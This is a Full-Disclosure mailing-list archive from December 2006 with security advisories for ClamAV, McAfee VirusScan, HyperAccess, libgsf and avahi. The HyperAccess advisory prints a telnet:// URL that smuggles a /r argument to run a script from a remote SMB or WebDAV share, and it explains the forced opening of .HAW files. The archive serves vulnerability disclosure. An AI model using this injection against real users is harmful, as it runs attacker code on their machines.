 can lead to either a) a crash (CVE-2006-5874), or b) a bypass of virus
 detection (CVE-2006-6406).

 As well, a vulnerability was discovered that allows remote attackers to
 cause a stack overflow and application crash by wrapping many layers of
 multipart/mixed content around a document (CVE-2006-6481).

 The latest ClamAV is being provided to address these issues.
 _______________________________________________________________________

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5874
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6406
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6481
 _______________________________________________________________________
 
 Updated Packages:
 
 Mandriva Linux 2006.0:
 b62b980e893f31cb4a1868bf654111b1  2006.0/i586/clamav-0.88.7-0.1.20060mdk.i586.rpm
 45224507b6eb7548d77d350e49b779bf  2006.0/i586/clamav-db-0.88.7-0.1.20060mdk.i586.rpm
 2839e6db4e043c8c5f30242073fd463a  2006.0/i586/clamav-milter-0.88.7-0.1.20060mdk.i586.rpm
 1efab3d20fc9a3ee591bca6cd911f432  2006.0/i586/clamd-0.88.7-0.1.20060mdk.i586.rpm
 a02b321e3540dc8746568ceb89978d8a  2006.0/i586/libclamav1-0.88.7-0.1.20060mdk.i586.rpm
 a2a63b58aa4799427b10b2ef3df0312a  2006.0/i586/libclamav1-devel-0.88.7-0.1.20060mdk.i586.rpm 
 d0eec42b243ddf7adf64cf64d1220381  2006.0/SRPMS/clamav-0.88.7-0.1.20060mdk.src.rpm

 Mandriva Linux 2006.0/X86_64:
 c82c856996f6916e538ad1d8108f32ff  2006.0/x86_64/clamav-0.88.7-0.1.20060mdk.x86_64.rpm
 c14d9d0ff168241afaed73f5835b1e76  2006.0/x86_64/clamav-db-0.88.7-0.1.20060mdk.x86_64.rpm
 501ae197ee84e3a9b791bab78e27d744  2006.0/x86_64/clamav-milter-0.88.7-0.1.20060mdk.x86_64.rpm
 795e8d155a0b93f3854c2a454f265cbd  2006.0/x86_64/clamd-0.88.7-0.1.20060mdk.x86_64.rpm
 94d70db54cb3129082c5c30d294368d9  2006.0/x86_64/lib64clamav1-0.88.7-0.1.20060mdk.x86_64.rpm
 d130298465adc84967cc4b2f00b7e3ba  2006.0/x86_64/lib64clamav1-devel-0.88.7-0.1.20060mdk.x86_64.rpm 
 d0eec42b243ddf7adf64cf64d1220381  2006.0/SRPMS/clamav-0.88.7-0.1.20060mdk.src.rpm

 Mandriva Linux 2007.0:
 96ed9d67bba561245f73cc69596c4d47  2007.0/i586/clamav-0.88.7-1.1mdv2007.0.i586.rpm
 3b0d3b89b0507b6a8c65b675a0fbb67b  2007.0/i586/clamav-db-0.88.7-1.1mdv2007.0.i586.rpm
 31a67792b8319f86c1a48d82c78c06a0  2007.0/i586/clamav-milter-0.88.7-1.1mdv2007.0.i586.rpm
 3277aa7171b3e4d05d03d7ee7d1c0ed4  2007.0/i586/clamd-0.88.7-1.1mdv2007.0.i586.rpm
 c25960475a4606bbd910a0200e4cf53f  2007.0/i586/libclamav1-0.88.7-1.1mdv2007.0.i586.rpm
 265ac03db8213dd9bfca2723b300a763  2007.0/i586/libclamav1-devel-0.88.7-1.1mdv2007.0.i586.rpm 
 6a4400d492a1a960b8d92f00552d7d18  2007.0/SRPMS/clamav-0.88.7-1.1mdv2007.0.src.rpm

 Mandriva Linux 2007.0/X86_64:
 88d6558eaedc651f5997a25a303079a5  2007.0/x86_64/clamav-0.88.7-1.1mdv2007.0.x86_64.rpm
 78e4cd526a8622b6e12f84fa4ae3d6d0  2007.0/x86_64/clamav-db-0.88.7-1.1mdv2007.0.x86_64.rpm
 61e1966f5630a939136957d82acbb4c6  2007.0/x86_64/clamav-milter-0.88.7-1.1mdv2007.0.x86_64.rpm
 9d19aefac34f54e499c36733eca73111  2007.0/x86_64/clamd-0.88.7-1.1mdv2007.0.x86_64.rpm
 bdf0b48ad7b2afb5aa17b57f42482cf8  2007.0/x86_64/lib64clamav1-0.88.7-1.1mdv2007.0.x86_64.rpm
 2cd6d0d8d721cf027d0e2bcaebc34cbc  2007.0/x86_64/lib64clamav1-devel-0.88.7-1.1mdv2007.0.x86_64.rpm 
 6a4400d492a1a960b8d92f00552d7d18  2007.0/SRPMS/clamav-0.88.7-1.1mdv2007.0.src.rpm

 Corporate 3.0:
 feaa3bc3bf4a008ebe28be198d00fdf3  corporate/3.0/i586/clamav-0.88.7-0.1.C30mdk.i586.rpm
 07d17cdbf4f6037211a6ccd8fa19dacb  corporate/3.0/i586/clamav-db-0.88.7-0.1.C30mdk.i586.rpm
 86d5d1ba6a021918dfec382d363f1b6c  corporate/3.0/i586/clamav-milter-0.88.7-0.1.C30mdk.i586.rpm
 cd6b3538836b38a4280bc87b8973622f  corporate/3.0/i586/clamd-0.88.7-0.1.C30mdk.i586.rpm
 9267bc8bfe596439de8886223bad26e9  corporate/3.0/i586/libclamav1-0.88.7-0.1.C30mdk.i586.rpm
 4682ad4e008c5ce93429034abe40d5d6  corporate/3.0/i586/libclamav1-devel-0.88.7-0.1.C30mdk.i586.rpm 
 98f8117362b50ca3e775894d45a5fcfb  corporate/3.0/SRPMS/clamav-0.88.7-0.1.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 cfa59847b3868d67dac9c61ce07a310d  corporate/3.0/x86_64/clamav-0.88.7-0.1.C30mdk.x86_64.rpm
 53d4c93840bb02b1092b2a8122e555e5  corporate/3.0/x86_64/clamav-db-0.88.7-0.1.C30mdk.x86_64.rpm
 893ef35e464ef5e9b1f7bad7ce1b1842  corporate/3.0/x86_64/clamav-milter-0.88.7-0.1.C30mdk.x86_64.rpm
 dfa01a642a5b00c298a6bd85a82d7a5d  corporate/3.0/x86_64/clamd-0.88.7-0.1.C30mdk.x86_64.rpm
 0ee7a5c70a4f3d2e01e19a3abda229fb  corporate/3.0/x86_64/lib64clamav1-0.88.7-0.1.C30mdk.x86_64.rpm
 7007fdd4b7c038c85947cda87c5262d3  corporate/3.0/x86_64/lib64clamav1-devel-0.88.7-0.1.C30mdk.x86_64.rpm 
 98f8117362b50ca3e775894d45a5fcfb  corporate/3.0/SRPMS/clamav-0.88.7-0.1.C30mdk.src.rpm

 Corporate 4.0:
 1fc7dc3770ca0a6aa16c6213d5d19fcc  corporate/4.0/i586/clamav-0.88.7-0.1.20060mlcs4.i586.rpm
 aa5259c487956b9de144fe12710f3f1c  corporate/4.0/i586/clamav-db-0.88.7-0.1.20060mlcs4.i586.rpm
 15fca428565d2dd9f2c169359826a95a  corporate/4.0/i586/clamav-milter-0.88.7-0.1.20060mlcs4.i586.rpm
 6a2ad1ede1e2d686c6d894e8c8b1e441  corporate/4.0/i586/clamd-0.88.7-0.1.20060mlcs4.i586.rpm
 87a1ad35fa480c91a769351bb9571698  corporate/4.0/i586/libclamav1-0.88.7-0.1.20060mlcs4.i586.rpm
 1c3f598674665c6c399e7799103dc4b7  corporate/4.0/i586/libclamav1-devel-0.88.7-0.1.20060mlcs4.i586.rpm 
 bbbd149e943f327577eba98d7c5dce0a  corporate/4.0/SRPMS/clamav-0.88.7-0.1.20060mlcs4.src.rpm

 Corporate 4.0/X86_64:
 5941452de407b4f4d0e5631d57cea1b8  corporate/4.0/x86_64/clamav-0.88.7-0.1.20060mlcs4.x86_64.rpm
 86dca13c238afc9ccb7683542ad12b44  corporate/4.0/x86_64/clamav-db-0.88.7-0.1.20060mlcs4.x86_64.rpm
 249703cc4d464ef85067b4659d0e6757  corporate/4.0/x86_64/clamav-milter-0.88.7-0.1.20060mlcs4.x86_64.rpm
 bf8037a275cf6e28a1a1227b5a9e5777  corporate/4.0/x86_64/clamd-0.88.7-0.1.20060mlcs4.x86_64.rpm
 7b507bda94614b3f4547415df052af0f  corporate/4.0/x86_64/lib64clamav1-0.88.7-0.1.20060mlcs4.x86_64.rpm
 2778dd446bbd8b0e7f8e756bd8d8634f  corporate/4.0/x86_64/lib64clamav1-devel-0.88.7-0.1.20060mlcs4.x86_64.rpm 
 bbbd149e943f327577eba98d7c5dce0a  corporate/4.0/SRPMS/clamav-0.88.7-0.1.20060mlcs4.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (GNU/Linux)

iD8DBQFFgKmimqjQ0CJFipgRAo1UAKD1yGF4pBsvp0qCiA8d6+Y1fOqnRQCeLXip
wqTUVda/tbDQwDjyJK5R76c=
=onOo
-----END PGP SIGNATURE-----



From jaervosz at gentoo.org  Thu Dec 14 05:58:03 2006
From: jaervosz at gentoo.org (Sune Kloppenborg Jeppesen)
Date: Thu, 14 Dec 2006 06:58:03 +0100
Subject: [Full-disclosure] [ GLSA 200612-15 ] McAfee VirusScan: Insecure
	DT_RPATH
Message-ID: <200612140658.03990.jaervosz@gentoo.org>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200612-15
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: McAfee VirusScan: Insecure DT_RPATH
      Date: December 14, 2006
      Bugs: #156989
        ID: 200612-15

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

McAfee VirusScan for Linux is distributed with an insecure DT_RPATH,
potentially allowing a remote attacker to execute arbitrary code.

Background
==========

McAfee VirusScan for Linux is a commercial antivirus solution for
Linux.

Affected packages
=================

    -------------------------------------------------------------------
     Package             /  Vulnerable  /                   Unaffected
    -------------------------------------------------------------------
  1  app-antivirus/vlnx      <= 4510e                      Vulnerable!
    -------------------------------------------------------------------
     NOTE: Certain packages are still vulnerable. Users should migrate
           to another package if one is available or wait for the
           existing packages to be marked stable by their
           architecture maintainers.

Description
===========

Jakub Moc of Gentoo Linux discovered that McAfee VirusScan was
distributed with an insecure DT_RPATH which included the current
working directory, rather than $ORIGIN which was probably intended.

Impact
======

An attacker could entice a VirusScan user to scan an arbitrary file and
execute arbitrary code with the privileges of the VirusScan user by
tricking the dynamic loader into loading an untrusted ELF DSO. An
automated system, such as a mail scanner, may be subverted to execute
arbitrary code with the privileges of the process invoking VirusScan.

Workaround
==========

Do not scan files or execute VirusScan from an untrusted working
directory.

Resolution
==========

As VirusScan verifies that it has not been modified before executing,
it is not possible to correct the DT_RPATH. Furthermore, this would
violate the license that VirusScan is distributed under. For this
reason, the package has been masked in Portage pending the resolution
of this issue.

    # emerge --ask --verbose --unmerge "app-antivirus/vlnx"

References
==========

  [ 1 ] CVE-2006-6474
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6474

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200612-15.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security at gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061214/8ae6df36/attachment.bin 

From brett.moore at security-assessment.com  Thu Dec 14 03:00:17 2006
From: brett.moore at security-assessment.com (Brett Moore)
Date: Thu, 14 Dec 2006 16:00:17 +1300
Subject: [Full-disclosure] HyperAccess - Multiple Vulnerabilities
Message-ID: <3F6918F2F2125C4BB95462A2ED1454B10DEA03@pukeko.smb2go.net>

Not long now...

========================================================================
= Hyper Access - Multiple Vulnerabilities
=
= Vendor Website:  
= http://www.hilgraeve.com
=
= Affected Software:
=       Hyper Access 8.4 (and possibly lower)
=
= Public disclosure on Thursday December 14, 2006
========================================================================

== Overview ==

HyperAccess is the official FULL-POWERED upgrade from HyperTerminal and 
HyperTerminal Private Edition. It is the product from which
HyperTerminal 
and HyperTerminal Private Edition are derived. HyperAccess offers a wide

array of additional capabilities, with a similar look andfeel.

This advisory discloses two separate (but similar) security issues in 
the latest version of HyperAccess .

* Command Execution Through .HAW Opening * 

HyperAccess saves 'sessions' as .haw files. These extensions are setup
to 
open without user intervention, through the editflags setting the in the

registry key: 

  HKEY_CLASSES_ROOT\HAWin32\EditFlags.

If a user, using Internet Explorer, browses to a web site that hosts a 
.HAW, an automatic download and open can be forced. The file will be
opened and parsed by the installed version of HyperAccess.

A .HAW file can be saved with an option 'Script To Run Before
Connecting'
and this can be setup to load  a script file from either an SMB share or

a WEBDAV web share. 

The script command offered by HyperAccess include built in commands as 
well as standard vbscript. This allows the creation of a script that 
uses WScript.Shell to spawn other executables.

This attack requires the target to visit the attackers website, and be
able to connect to the remote share.

A suggested fix is to remove/modify the editflags setting to prevent the

automatic opening and parsing of .HAW files.


* Command Execution Through Telnet URL Protocol *

HyperAccess sets up a URL Protocol to handle the telnet:// URL handler. 
This setting can be viewed in the registry key:
 
  HKEY_CLASSES_ROOT\telnet\shell\open\command 

which is set to 
  
  c:\program files\hawin32\hawin32.exe /t %1

HyperAccess will accept /r as a command line parameter to specify a 
script file to run. This command can be passed on the URL through
Internet 
Explorer using a URL such as;

  telnet://IPADDRESS:PORT # /r \\SERVER\share\scriptfile.txt

Where SERVER is an SMB share or a WEBDAV web share hosting a malicious 
script to run.

The script command offered by Hyperaccess include built in commands as 
well as standard vbscript. This allows the creation of a script that 
uses WScript.Shell to spawn other executables.

This attack requires the target to visit the attackers website, and be
able to connect to the remote share.


A suggested fix is to remove the telnet handler from the registry.


== Solutions ==

Currently, the issues outlined in the report have been added to a 
list of issues to evaluate during the next update of HyperACCESS.
There is currently no planned date for this update.

== Credit ==

Discovered and advised to Hilgraeve November 10, 2006 by Brett Moore of
Security-Assessment.com

== About Security-Assessment.com ==

Security-Assessment.com is Australasia's leading team of Information 
Security consultants specialising in providing high quality Information 
Security services to clients throughout the Asia Pacific region. Our 
clients include some of the largest globally recognised companies in 
areas such as finance, telecommunications, broadcasting, legal and 
government. Our aim is to provide the very best independent advice and 
a high level of technical expertise while creating long and lasting 
professional relationships with our clients.

Security-Assessment.com is committed to security research and 
development, and its team continues to identify and responsibly publish 
vulnerabilities in public and private software vendor's products. 
Members of the Security-Assessment.com R&D team are globally recognised 
through their release of whitepapers and presentations related to new 
security research.

Security-Assessment.com is an Endorsed Commonwealth Government of 
Australia supplier and sits on the Australian Government 
Attorney-General's Department Critical Infrastructure Project panel. 
We are certified by both Visa and MasterCard under their Payment 
Card Industry Data Security Standard Programs.



From announce-noreply at rpath.com  Thu Dec 14 08:01:20 2006
From: announce-noreply at rpath.com (rPath Update Announcements)
Date: Thu, 14 Dec 2006 03:01:20 -0500
Subject: [Full-disclosure] rPSA-2006-0232-1 libgsf
Message-ID: <458104d0.uNJHSSujFXW9HnTZ%announce-noreply@rpath.com>

rPath Security Advisory: 2006-0232-1
Published: 2006-12-14
Products: rPath Linux 1
Rating: Minor
Exposure Level Classification:
    Indirect User Deterministic Unauthorized Access
Updated Versions:
    libgsf=/conary.rpath.com at rpl:devel//1/1.12.0-4.2-1

References:
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4514
    https://issues.rpath.com/browse/RPL-857

Description:
    Previous versions of the libgsf package contain a flaw in parsing
    OLE documents that could allow an attacker to crash applications
    that use libgsf, and possibly to cause them to execute arbitrary
    code, by presenting a user with an intentionally malformed OLE
    document.



From kokanin at gmail.com  Thu Dec 14 09:57:33 2006
From: kokanin at gmail.com (=?ISO-8859-1?Q?Knud_Erik_H=F8jgaard?=)
Date: Thu, 14 Dec 2006 10:57:33 +0100
Subject: [Full-disclosure] HyperAccess - Multiple Vulnerabilities
In-Reply-To: <3F6918F2F2125C4BB95462A2ED1454B10DEA03@pukeko.smb2go.net>
References: <3F6918F2F2125C4BB95462A2ED1454B10DEA03@pukeko.smb2go.net>
Message-ID: 

On 12/14/06, Brett Moore  wrote:
> Not long now...

'till what, christmas?



From i.m.crazy.frog at gmail.com  Thu Dec 14 09:17:40 2006
From: i.m.crazy.frog at gmail.com (crazy frog crazy frog)
Date: Thu, 14 Dec 2006 14:47:40 +0530
Subject: [Full-disclosure] SinFP OS fingerprinting online demo
In-Reply-To: 
References: <20061213150839.GA3572@oshima.enslaved.lan>
	
Message-ID: <41011d980612140117s373fd440n94b80c654cd4bfb6@mail.gmail.com>

works fine for me :)


On 12/14/06, Simon Smith  wrote:
> Doesn't seem to work man ;P
>
>
> On 12/13/06 10:08 AM, "fd at gomor.org"  wrote:
>
> > Sorry, I forgot to mention that a benchmark versus Nmap has
> > been done by someone on his blog:
> >
> > http://www.computerdefense.org/?p=173
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>


-- 
---------------------------------------
http://www.secgeeks.com
Submit you security articles,send them to paper at secgeeks.com

http://www.newskicks.com
Submit and kick for new stories from all around the world.
---------------------------------------



From martin.pitt at canonical.com  Thu Dec 14 12:28:58 2006
From: martin.pitt at canonical.com (Martin Pitt)
Date: Thu, 14 Dec 2006 13:28:58 +0100
Subject: [Full-disclosure] [USN-380-2] avahi regression
Message-ID: <20061214122858.GB5068@piware.de>

=========================================================== 
Ubuntu Security Notice USN-380-2          December 14, 2006
avahi regression
https://launchpad.net/bugs/72728
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 5.10
Ubuntu 6.06 LTS
Ubuntu 6.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 5.10:
  avahi-daemon                             0.5.2-1ubuntu1.3

Ubuntu 6.06 LTS:
  avahi-daemon                             0.6.10-0ubuntu3.3

Ubuntu 6.10:
  avahi-daemon                             0.6.13-2ubuntu2.3

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

USN-380-1 fixed a vulnerability in Avahi. However, if used with
Network manager, that version occasionally failed to resolve .local
DNS names until Avahi got restarted. This update fixes the problem.

We apologize for the inconvenience.


Updated packages for Ubuntu 5.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/avahi_0.5.2-1ubuntu1.3.diff.gz
      Size/MD5:     5402 6988a88488201140d1941e18e9baf974
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/avahi_0.5.2-1ubuntu1.3.dsc
      Size/MD5:     1151 c3edfa425968e2fd8053f37d8e06387a
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/avahi_0.5.2.orig.tar.gz
      Size/MD5:   651504 dc7ce24ffaab251a2002bf1dfdbe256d

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/avahi-utils_0.5.2-1ubuntu1.3_all.deb
      Size/MD5:    15784 32a0566e13d26c2ac618aee8d6310f43
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/libavahi-cil_0.5.2-1ubuntu1.3_all.deb
      Size/MD5:    20748 ce2a400aa9d37b33d234d35fbd0765f5
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/python2.4-avahi_0.5.2-1ubuntu1.3_all.deb
      Size/MD5:     8964 56044882a59dbea82e50eb889ddab030

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)

    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/avahi-daemon_0.5.2-1ubuntu1.3_amd64.deb
      Size/MD5:    49074 2d1bfbec40fb0990e9d9c3e7f9a7d5d2
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/avahi-dnsconfd_0.5.2-1ubuntu1.3_amd64.deb
      Size/MD5:    15290 a43a4acb239c7da47baf1615c2d61b27
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/libavahi-client-dev_0.5.2-1ubuntu1.3_amd64.deb
      Size/MD5:    27972 182b8adf040f20589b883bf427fb0656
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/libavahi-client1_0.5.2-1ubuntu1.3_amd64.deb
      Size/MD5:    23102 c7e27c18c810ea439c8bb867ab5e8fda
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/libavahi-common-dev_0.5.2-1ubuntu1.3_amd64.deb
      Size/MD5:    31536 e0db12eff12ed67e75ae46aeecf14253
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/libavahi-common0_0.5.2-1ubuntu1.3_amd64.deb
      Size/MD5:    20540 e32a02c8e9c41ca46e86c24ae146afda
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/libavahi-core-dev_0.5.2-1ubuntu1.3_amd64.deb
      Size/MD5:   104490 2633408fbbe5c64cab9d6c386580bf96
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/libavahi-core1_0.5.2-1ubuntu1.3_amd64.deb
      Size/MD5:    75398 14e59e657b680cdb009106679d91977f
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/libavahi-glib-dev_0.5.2-1ubuntu1.3_amd64.deb
      Size/MD5:    10038 b6a18e683e2c5aa1a187375a54b8e39a
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/libavahi-glib0_0.5.2-1ubuntu1.3_amd64.deb
      Size/MD5:     8888 109ddf7229ecc9ee684d75006fd7d71d
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/libavahi-qt3-0_0.5.2-1ubuntu1.3_amd64.deb
      Size/MD5:    11426 da757a2b37737aa22e5083d65d5fc14f
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/libavahi-qt3-dev_0.5.2-1ubuntu1.3_amd64.deb
      Size/MD5:    11708 210e14ee05911ed7fd52945010a5297f
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/libavahi-qt4-0_0.5.2-1ubuntu1.3_amd64.deb
      Size/MD5:     9284 75a6ac74a009a60d9413e0fe9669c163
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/libavahi-qt4-dev_0.5.2-1ubuntu1.3_amd64.deb
      Size/MD5:     9678 73fd48ec0f9ece9943c649faaacf7829

  i386 architecture (x86 compatible Intel/AMD)

    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/avahi-daemon_0.5.2-1ubuntu1.3_i386.deb
      Size/MD5:    45014 d48dae82e7556cf9af9307c7bce01941
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/avahi-dnsconfd_0.5.2-1ubuntu1.3_i386.deb
      Size/MD5:    14338 21402b49b74c7273191c57fc979de17e
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/libavahi-client-dev_0.5.2-1ubuntu1.3_i386.deb
      Size/MD5:    24598 175251b828d8960c443a4c9f31b3888a
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/libavahi-client1_0.5.2-1ubuntu1.3_i386.deb
      Size/MD5:    19854 ef58f6396e2045a97e5e005d68656436
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/libavahi-common-dev_0.5.2-1ubuntu1.3_i386.deb
      Size/MD5:    28406 e7f9396068b82746af52522d178568bb
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/libavahi-common0_0.5.2-1ubuntu1.3_i386.deb
      Size/MD5:    18792 3fc845f7b6e5805b8368ab474a2d5cd3
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/libavahi-core-dev_0.5.2-1ubuntu1.3_i386.deb
      Size/MD5:    88558 8d12af321739780921a314e3ffc20517
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/libavahi-core1_0.5.2-1ubuntu1.3_i386.deb
      Size/MD5:    65786 10496728db6baae324d914bb9d3e76e9
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/libavahi-glib-dev_0.5.2-1ubuntu1.3_i386.deb
      Size/MD5:     9152 8f4282dbbbefeec5872e885943bb0a6f
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/libavahi-glib0_0.5.2-1ubuntu1.3_i386.deb
      Size/MD5:     8500 bbf129e3c50f81454c34075ba94cf1b4
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/libavahi-qt3-0_0.5.2-1ubuntu1.3_i386.deb
      Size/MD5:    11134 948a3c39899cfd046c7668e78768a2dd
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/libavahi-qt3-dev_0.5.2-1ubuntu1.3_i386.deb
      Size/MD5:    10918 9daea8a858f373d20709c4889c524013
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/libavahi-qt4-0_0.5.2-1ubuntu1.3_i386.deb
      Size/MD5:     9042 dae54aa48ead1442a6093aba30cac440
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/libavahi-qt4-dev_0.5.2-1ubuntu1.3_i386.deb
      Size/MD5:     9048 96ae33969fa938a22977a3c1d1be7cb7

  powerpc architecture (Apple Macintosh G3/G4/G5)

    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/avahi-daemon_0.5.2-1ubuntu1.3_powerpc.deb
      Size/MD5:    47774 5052cf46e190e91896cfdbeab585e593
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/avahi-dnsconfd_0.5.2-1ubuntu1.3_powerpc.deb
      Size/MD5:    16346 01186398dcaf08894ceeab21c01efaa7
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/libavahi-client-dev_0.5.2-1ubuntu1.3_powerpc.deb
      Size/MD5:    28626 12d97fdc1c39e264ba2de141f01d9704
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/libavahi-client1_0.5.2-1ubuntu1.3_powerpc.deb
      Size/MD5:    22996 7856f700dac6dd51c4bc6686be34b632
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/libavahi-common-dev_0.5.2-1ubuntu1.3_powerpc.deb
      Size/MD5:    31856 a6d0dfa09ade94bd84b1d525d00b3167
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/libavahi-common0_0.5.2-1ubuntu1.3_powerpc.deb
      Size/MD5:    22574 2978be423f2c9a37b101f23970f74606
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/libavahi-core-dev_0.5.2-1ubuntu1.3_powerpc.deb
      Size/MD5:   109334 14c692fa99c2e7dafd8369f4f0c76367
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/libavahi-core1_0.5.2-1ubuntu1.3_powerpc.deb
      Size/MD5:    70080 469d5eb592f7a20c44a2207f8709e3f1
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/libavahi-glib-dev_0.5.2-1ubuntu1.3_powerpc.deb
      Size/MD5:    10184 48c164b0ec011d0d0b84e08023789a60
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/libavahi-glib0_0.5.2-1ubuntu1.3_powerpc.deb
      Size/MD5:    10856 20ca9988f3bb80b6f32656ab6c8f8517
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/libavahi-qt3-0_0.5.2-1ubuntu1.3_powerpc.deb
      Size/MD5:    13066 348adcf5a90f5d804a9fd22e187eeb95
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/libavahi-qt3-dev_0.5.2-1ubuntu1.3_powerpc.deb
      Size/MD5:    11952 b97c9ade7a1fa53bc3aaa75a32739c31
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/libavahi-qt4-0_0.5.2-1ubuntu1.3_powerpc.deb
      Size/MD5:    10952 1288efcff19a7e5c6abe07eb43785d1f
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/libavahi-qt4-dev_0.5.2-1ubuntu1.3_powerpc.deb
      Size/MD5:     9748 f6f1317b3c0e0d1ac959f5233e3a6c2b

Updated packages for Ubuntu 6.06 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/avahi_0.6.10-0ubuntu3.3.diff.gz
      Size/MD5:    12460 2a603a2fb19500579cecf2f08cc5d754
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/avahi_0.6.10-0ubuntu3.3.dsc
      Size/MD5:     1429 001269283381c02f16d4b60b3dd45786
    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/avahi_0.6.10.orig.tar.gz
      Size/MD5:   879819 cfb9e05c138dff4c430a35eee6229e8a

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/avahi-discover_0.6.10-0ubuntu3.3_all.deb
      Size/MD5:    20410 f137492d39510223bed7f3c2094c0ac9
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/libavahi-cil_0.6.10-0ubuntu3.3_all.deb
      Size/MD5:    39744 4b9a4dfa137b28d0748d37f666953098
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/monodoc-avahi-manual_0.6.10-0ubuntu3.3_all.deb
      Size/MD5:    40108 8013823428ddb2ade50a444ab4c21dd8
    http://security.ubuntu.com/ubuntu/pool/universe/a/avahi/python2.4-avahi_0.6.10-0ubuntu3.3_all.deb
      Size/MD5:    21186 c15767ea2f0bdeb98903e5139790d341

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)

    http://security.ubuntu.com/ubuntu/pool/main/a/avahi/avahi-daemon_0.6.10-0ubuntu3.3_amd64.deb
